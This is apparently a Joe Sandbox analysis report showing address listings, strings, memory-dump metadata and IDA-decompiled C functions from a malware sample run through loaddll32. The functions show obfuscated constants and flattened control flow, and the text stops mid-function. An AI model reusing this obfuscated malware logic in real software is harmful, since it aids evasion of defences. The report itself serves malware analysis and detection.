0x02b37a8f
0x02b37a94
0x02b37a9e
0x02b37aa2
0x02b37aaa
0x02b37ab5
0x02b37ac0
0x02b37acb
0x02b37ad3
0x02b37adb
0x02b37ae3
0x02b37ae8
0x02b37af0
0x02b37af8
0x02b37b00
0x02b37b0d
0x02b37b11
0x02b37b19
0x02b37b21
0x02b37b26
0x02b37b2e
0x02b37b36
0x02b37b3e
0x02b37b46
0x02b37b4b
0x02b37b50
0x02b37b55
0x02b37b5d
0x02b37b65
0x02b37b71
0x02b37b74
0x02b37b78
0x02b37b80
0x02b37b88
0x02b37b95
0x02b37b9b
0x02b37ba8
0x02b37bb0
0x02b37bb8
0x02b37bc0
0x02b37bcb
0x02b37bd6
0x02b37be1
0x02b37bef
0x02b37bf7
0x02b37bfb
0x02b37c03
0x02b37c0b
0x02b37c13
0x02b37c1b
0x02b37c23
0x02b37c2b
0x02b37c2b
0x02b37c33
0x02b37c33
0x02b37c33
0x02b37c33
0x02b37c35
0x00000000
0x00000000
0x02b37c3b
0x02b37d45
0x02b37d48
0x00000000
0x02b37c41
0x02b37c47
0x02b37d31
0x02b37d33
0x02b37d36
0x00000000
0x02b37c4d
0x02b37c53
0x02b37d1b
0x02b37d20
0x02b37d23
0x00000000
0x02b37c59
0x02b37c5f
0x02b37cdf
0x02b37ce0
0x02b37ce4
0x02b37ce9
0x02b37cec
0x02b37cee
0x02b37cf0
0x02b37cf6
0x00000000
0x02b37cf6
0x02b37c61
0x02b37c67
0x02b37cb7
0x02b37cbc
0x02b37cbf
0x00000000
0x02b37c69
0x02b37c6f
0x00000000
0x02b37c75
0x02b37c90
0x02b37c95
0x02b37c98
0x00000000
0x02b37c98
0x02b37c6f
0x02b37c67
0x02b37c5f
0x02b37c53
0x02b37c47
0x00000000
0x02b37c3b
0x02b37d52
0x02b37d58
0x02b37e4e
0x02b37e53
0x02b37e56
0x00000000
0x02b37d5e
0x02b37d5e
0x02b37d64
0x02b37e21
0x02b37e26
0x02b37e29
0x00000000
0x02b37d6a
0x02b37d6a
0x02b37d6c
0x02b37dee
0x02b37df3
0x02b37df6
0x00000000
0x02b37d6e
0x02b37d6e
0x02b37d74
0x02b37dca
0x02b37dcf
0x02b37dd2
0x00000000
0x02b37d76
0x02b37d76
0x02b37d7c
0x00000000
0x02b37d82
0x02b37d9d
0x02b37da2
0x02b37da5
0x00000000
0x02b37da5
0x02b37d7c
0x02b37d74
0x02b37d6c
0x02b37d64
0x00000000
0x02b37e5b
0x02b37e5b
0x02b37e5b
0x02b37e67
0x02b37e69
0x02b37e6e
0x02b37e6e
0x02b37e78

Strings

*, xrefs: 02B37BA8
sG', xrefs: 02B37849
&, xrefs: 02B37C23
[}, xrefs: 02B378B2
0i^, xrefs: 02B37885
4-,a, xrefs: 02B379DD
)uL, xrefs: 02B37BE1

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )uL$*$0i^$4-,a$sG'$&$[}
API String ID: 0-4036371101
Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction ID: ccf238a9ca06540c111a9c9555e8b9407de2169b234b043c55a9d093e1ccd4f9
Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction Fuzzy Hash: 26F133B1508384DFE369CF21C489A5BFBF1FB84348F50891DE69A86260DBB58949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B36B7A, Relevance: 9.0, Strings: 7, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B36B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t242;
				void* _t265;
				void* _t269;
				signed int _t271;
				signed int _t272;
				char* _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr* _t285;
				void* _t287;
				signed int _t292;
				intOrPtr _t298;
				intOrPtr _t324;
				intOrPtr* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				void* _t336;
				void* _t337;

				_t285 = _a8;
				_push(_t285);
				_push(_a4);
				_t326 = __edx;
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t242);
				_v100 = 0x757930;
				_t337 = _t336 + 0x10;
				_v96 = 0xd80ad;
				_t324 = 0;
				_v92 = 0x3caa7;
				_v88 = 0;
				_t287 = 0x43d278a;
				_v140 = 0xa476d3;
				_v140 = _v140 + 0x8b71;
				_v140 = _v140 ^ 0x00a50244;
				_v192 = 0x86f1c9;
				_v192 = _v192 | 0xd7b81b76;
				_t327 = 0x1d;
				_v192 = _v192 / _t327;
				_v192 = _v192 + 0xffff13d4;
				_v192 = _v192 ^ 0x076f980a;
				_v188 = 0x843aad;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xc1fad14f;
				_t328 = 0x74;
				_v188 = _v188 * 0x5b;
				_v188 = _v188 ^ 0x93eb17e1;
				_v168 = 0x8317bb;
				_v168 = _v168 ^ 0x1362ec48;
				_v168 = _v168 ^ 0x4008a55c;
				_v168 = _v168 ^ 0x53e7b525;
				_v144 = 0x20a76b;
				_v144 = _v144 / _t328;
				_v144 = _v144 ^ 0x000a47fb;
				_v196 = 0xe0aa92;
				_v196 = _v196 ^ 0x05a4f46c;
				_t329 = 0x24;
				_v196 = _v196 / _t329;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0x257ea781;
				_v200 = 0xe588c5;
				_t330 = 0x29;
				_v200 = _v200 / _t330;
				_v200 = _v200 >> 6;
				_v200 = _v200 >> 0x10;
				_v200 = _v200 ^ 0x000d5940;
				_v164 = 0x4155a9;
				_v164 = _v164 >> 5;
				_v164 = _v164 | 0x5ba52662;
				_v164 = _v164 ^ 0x5ba55520;
				_v160 = 0x4466c5;
				_v160 = _v160 >> 9;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x000d6457;
				_v148 = 0x35624e;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 ^ 0x000abf08;
				_v172 = 0x5696ab;
				_v172 = _v172 + 0xe488;
				_v172 = _v172 + 0x10cb;
				_v172 = _v172 ^ 0x0055d7ec;
				_v128 = 0xad635c;
				_v128 = _v128 ^ 0xb55b0f96;
				_v128 = _v128 ^ 0xb5f22a9b;
				_v208 = 0x275835;
				_t108 =  &_v208; // 0x275835
				_t331 = 0x37;
				_push("true");
				_v208 =  *_t108 / _t331;
				_v208 = _v208 ^ 0xb04b577b;
				_pop(_t332);
				_v208 = _v208 / _t332;
				_v208 = _v208 ^ 0x055d5c1c;
				_v132 = 0x1cc441;
				_t333 = 0x6a;
				_v132 = _v132 / _t333;
				_v132 = _v132 ^ 0x000e83d7;
				_v204 = 0x125b67;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0xe127959b;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x07419ea5;
				_v180 = 0x68abbe;
				_v180 = _v180 | 0x57b8f8fa;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0x7df5736a;
				_v156 = 0x6240f4;
				_v156 = _v156 + 0xffffe0b8;
				_t334 = 0x69;
				_v156 = _v156 * 0x13;
				_v156 = _v156 ^ 0x0741ad16;
				_v124 = 0xa95440;
				_v124 = _v124 / _t334;
				_v124 = _v124 ^ 0x00021dd5;
				_v176 = 0x6e61ec;
				_v176 = _v176 + 0x7ec3;
				_v176 = _v176 | 0x8e41022f;
				_v176 = _v176 ^ 0x8e60c50b;
				_v120 = 0x9285fa;
				_v120 = _v120 ^ 0x677ff2d5;
				_v120 = _v120 ^ 0x67e9a1bb;
				_v152 = 0x5286f5;
				_v152 = _v152 + 0xffff3b7a;
				_v152 = _v152 ^ 0x016928ba;
				_v152 = _v152 ^ 0x013cf174;
				_v184 = 0xd65a61;
				_v184 = _v184 * 0x45;
				_v184 = _v184 + 0xffff6116;
				_v184 = _v184 ^ 0x39cc51e9;
				_v136 = 0xa284b3;
				_v136 = _v136 + 0x4b38;
				_v136 = _v136 ^ 0x00a4fd93;
				while(_t287 != 0x1b81945) {
					if(_t287 == 0x314f545) {
						_t265 = E02B546BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
						_t337 = _t337 + 0x10;
						if(_t265 == 0) {
							L25:
							return _t324;
						}
						_t287 = 0x958f9d6;
						continue;
					}
					if(_t287 == 0x43d278a) {
						_t287 = 0xee3ea02;
						continue;
					}
					if(_t287 == 0x55d8418) {
						_t292 = _v172;
						_t269 = E02B507AA(_t292, _v128,  &_v84, _v208,  &_v76);
						_t337 = _t337 + 0xc;
						if(_t269 != 0) {
							_push(_t292);
							_push(_t292);
							_t282 = E02B3C5D8(_v80);
							_t337 = _t337 + 0xc;
							 *_t326 = _t282;
							if(_t282 != 0) {
								E02B4C9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
								_t337 = _t337 + 0x10;
								 *((intOrPtr*)(_t326 + 4)) = _v80;
								_t324 = 1;
							}
						}
						_t287 = 0x1b81945;
						continue;
					}
					if(_t287 == 0x958f9d6) {
						_t271 = E02B3C473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
						_t337 = _t337 + 0x10;
						asm("sbb ecx, ecx");
						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
						continue;
					}
					if(_t287 != 0xee3ea02) {
						L24:
						if(_t287 != 0x1eefa0b) {
							continue;
						}
						goto L25;
					}
					_t272 =  *((intOrPtr*)(_t285 + 4));
					_t298 =  *_t285;
					_v112 = _t272;
					_v116 = _t298;
					_t274 = _t272 - 1 + _t298;
					while(_t274 > _t298) {
						if( *_t274 == 0) {
							break;
						}
						_t274 = _t274 - 1;
					}
					_t275 = _t274 - _t298;
					_v112 = _t275;
					if(_t275 == 0) {
						L14:
						_t287 = 0x314f545;
						continue;
					}
					while(_v112 % _v192 != _v140) {
						_t207 =  &_v112;
						 *_t207 = _v112 - 1;
						if( *_t207 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				E02B52B09(_v152, _v108, _v184, _v136);
				_t287 = 0x1eefa0b;
				goto L24;
			}

0x02b36b81
0x02b36b8b
0x02b36b8c
0x02b36b93
0x02b36b95
0x02b36b96
0x02b36b97
0x02b36b9c
0x02b36ba7
0x02b36baa
0x02b36bb5
0x02b36bb7
0x02b36bc4
0x02b36bcb
0x02b36bd0
0x02b36bd8
0x02b36be0
0x02b36be8
0x02b36bf0
0x02b36bfe
0x02b36c03
0x02b36c09
0x02b36c11
0x02b36c19
0x02b36c21
0x02b36c26
0x02b36c33
0x02b36c36
0x02b36c3a
0x02b36c42
0x02b36c4a
0x02b36c52
0x02b36c5a
0x02b36c62
0x02b36c72
0x02b36c76
0x02b36c7e
0x02b36c86
0x02b36c92
0x02b36c97
0x02b36c9d
0x02b36ca2
0x02b36caa
0x02b36cb6
0x02b36cb9
0x02b36cbd
0x02b36cc2
0x02b36cc7
0x02b36ccf
0x02b36cd7
0x02b36cdc
0x02b36ce4
0x02b36cec
0x02b36cf4
0x02b36cf9
0x02b36cfe
0x02b36d06
0x02b36d0e
0x02b36d13
0x02b36d1b
0x02b36d23
0x02b36d2d
0x02b36d35
0x02b36d3d
0x02b36d45
0x02b36d4d
0x02b36d55
0x02b36d5d
0x02b36d63
0x02b36d66
0x02b36d68
0x02b36d6e
0x02b36d7a
0x02b36d7f
0x02b36d85
0x02b36d8d
0x02b36d99
0x02b36d9e
0x02b36da4
0x02b36dac
0x02b36db4
0x02b36db9
0x02b36dc1
0x02b36dc6
0x02b36dce
0x02b36dd6
0x02b36dde
0x02b36de3
0x02b36deb
0x02b36df3
0x02b36e00
0x02b36e01
0x02b36e05
0x02b36e0d
0x02b36e20
0x02b36e24
0x02b36e2c
0x02b36e34
0x02b36e3c
0x02b36e44
0x02b36e4c
0x02b36e54
0x02b36e5c
0x02b36e64
0x02b36e6c
0x02b36e74
0x02b36e7c
0x02b36e84
0x02b36e91
0x02b36e95
0x02b36e9d
0x02b36ea5
0x02b36ead
0x02b36eb5
0x02b36ebd
0x02b36ecb
0x02b3702a
0x02b3702f
0x02b37034
0x02b3706b
0x02b37077
0x02b37077
0x02b37036
0x00000000
0x02b37036
0x02b36ed7
0x02b37004
0x00000000
0x02b37004
0x02b36ee3
0x02b36f94
0x02b36f99
0x02b36f9e
0x02b36fa3
0x02b36fb5
0x02b36fb6
0x02b36fbe
0x02b36fc3
0x02b36fc6
0x02b36fca
0x02b36fe8
0x02b36ff6
0x02b36ff9
0x02b36ffc
0x02b36ffc
0x02b36fca
0x02b36ffd
0x00000000
0x02b36ffd
0x02b36eef
0x02b36f62
0x02b36f67
0x02b36f6e
0x02b36f76
0x00000000
0x02b36f76
0x02b36ef7
0x02b3705f
0x02b37065
0x00000000
0x00000000
0x00000000
0x02b37065
0x02b36efd
0x02b36f00
0x02b36f02
0x02b36f07
0x02b36f0b
0x02b36f15
0x02b36f12
0x00000000
0x00000000
0x02b36f14
0x02b36f14
0x02b36f19
0x02b36f1b
0x02b36f1f
0x02b36f39
0x02b36f39
0x00000000
0x02b36f39
0x02b36f21
0x02b36f33
0x02b36f33
0x02b36f37
0x00000000
0x00000000
0x00000000
0x02b36f37
0x00000000
0x02b36f21
0x02b37053
0x02b3705a
0x00000000

Strings

Nb5, xrefs: 02B36D06
8K, xrefs: 02B36EAD
an, xrefs: 02B36E2C
Wd, xrefs: 02B36CFE
@Y, xrefs: 02B36CC7
0yu, xrefs: 02B36B9C
5X', xrefs: 02B36D5D

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
API String ID: 0-1112794312
Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction ID: 8a414c3f81b95e641defff032be17c8d49d07c330caa80552a8bf7ba3a60111a
Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction Fuzzy Hash: E7C143715083809FD329CF66C589A1BFBF2FBC5748F10891DF69686260DBB18949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 02B4DC71, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B4DC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E02B5298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E02B32DEA(_v96,  &_v8, _v60, 0x2b310a0, _v28, _v100, 0x2b310a0, 0x2b310a0, _v104, _v64, 0x2b310a0, 0x2b310a0, _v68, _v72, _v32, _v76, _v36, E02B4E1F8(0x2b310a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E02B4FECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0x2b56214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E02B353D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x02b4dc71
0x02b4dc74
0x02b4dc7e
0x02b4dc85
0x02b4dc8d
0x02b4dc95
0x02b4dca1
0x02b4dca5
0x02b4dcb0
0x02b4dcb5
0x02b4dcbb
0x02b4dcc3
0x02b4dccb
0x02b4dcd7
0x02b4dcdc
0x02b4dce2
0x02b4dcea
0x02b4dcf2
0x02b4dcfa
0x02b4dd02
0x02b4dd07
0x02b4dd0f
0x02b4dd17
0x02b4dd1f
0x02b4dd24
0x02b4dd2c
0x02b4dd34
0x02b4dd39
0x02b4dd3e
0x02b4dd46
0x02b4dd4e
0x02b4dd56
0x02b4dd5b
0x02b4dd63
0x02b4dd6b
0x02b4dd73
0x02b4dd7b
0x02b4dd83
0x02b4dd8b
0x02b4dd93
0x02b4dd98
0x02b4dda4
0x02b4dda9
0x02b4ddaf
0x02b4ddb7
0x02b4ddbf
0x02b4ddc8
0x02b4ddcd
0x02b4ddd3
0x02b4ddd8
0x02b4dde0
0x02b4dde8
0x02b4ddf0
0x02b4ddf8
0x02b4de00
0x02b4de08
0x02b4de14
0x02b4de17
0x02b4de1d
0x02b4de2a
0x02b4de38
0x02b4de3b
0x02b4de3f
0x02b4de43
0x02b4de4b
0x02b4de58
0x02b4de5c
0x02b4de64
0x02b4de6c
0x02b4de74
0x02b4de7c
0x02b4de84
0x02b4de8c
0x02b4de94
0x02b4de99
0x02b4dea1
0x02b4dea9
0x02b4deb1
0x02b4deb9
0x02b4dec1
0x02b4dec9
0x02b4ded1
0x02b4ded9
0x02b4dede
0x02b4dee6
0x02b4def3
0x02b4def7
0x02b4deff
0x02b4df07
0x02b4df0f
0x02b4df17
0x02b4df1f
0x02b4df27
0x02b4df2f
0x02b4df34
0x02b4df3c
0x02b4df49
0x02b4df4d
0x02b4df55
0x02b4df5d
0x02b4df62
0x02b4df6a
0x02b4df72
0x02b4df7a
0x02b4df82
0x02b4df8a
0x02b4df92
0x02b4df9a
0x02b4dfa2
0x02b4dfa2
0x02b4dfa4
0x02b4dfa5
0x02b4dfa5
0x02b4dfaa
0x00000000
0x02b4dfaa
0x02b4dfb8
0x02b4e0a0
0x02b4e0a7
0x02b4e0aa
0x02b4e0ac
0x02b4e0b4
0x00000000
0x02b4dfbe
0x02b4dfc4
0x02b4e001
0x02b4e00a
0x02b4e00e
0x02b4e065
0x02b4e082
0x02b4e085
0x02b4e08a
0x02b4e0d6
0x02b4e0d8
0x02b4e0dd
0x02b4dfc6
0x02b4dfcc
0x02b4dffa
0x00000000
0x02b4dfce
0x02b4dfd4
0x02b4dfda
0x02b4dfe0
0x02b4dfeb
0x02b4dfe8
0x02b4dfe8
0x02b4dfe8
0x02b4dff0
0x02b4dff3
0x02b4dfa5
0x00000000
0x02b4dfa5
0x02b4dfd4
0x02b4dfcc
0x02b4dfc4
0x00000000
0x02b4dfb8
0x02b4e0cd
0x02b4e0d4
0x00000000
0x02b4e0de
0x02b4e0de
0x02b4e0de
0x02b4e0f1
0x02b4e0f1
0x02b4dfa5

Strings

8+{, xrefs: 02B4DF3C
fH, xrefs: 02B4DD3E
s~eP, xrefs: 02B4DCFA
.|8, xrefs: 02B4DDB7
H%, xrefs: 02B4DCE2
41, xrefs: 02B4DEA1
1, xrefs: 02B4DD98

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .|8$1$41$8+{$H%$fH$s~eP
API String ID: 0-3664284304
Opcode ID: 0f9c72639ac87e26aa996f2080a1ffc66dffa5d1af672abaaa9f72026f568b45
Instruction ID: f330018c95db0bdfc9fec545cd37d47b58f4de6e0fd69fb3ff4093c70b256dd1
Opcode Fuzzy Hash: 0f9c72639ac87e26aa996f2080a1ffc66dffa5d1af672abaaa9f72026f568b45
Instruction Fuzzy Hash: 10B11F725083809FD368CF25D48A50BFBE2FBC4748F108A1DF69A86260D7B99949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 02B3670B, Relevance: 9.0, Strings: 7, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B3670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
